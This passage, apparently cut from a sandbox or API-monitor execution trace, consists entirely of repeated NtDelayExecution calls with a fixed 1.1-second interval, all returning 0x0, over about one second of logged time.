(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.997] NtDelayExecution 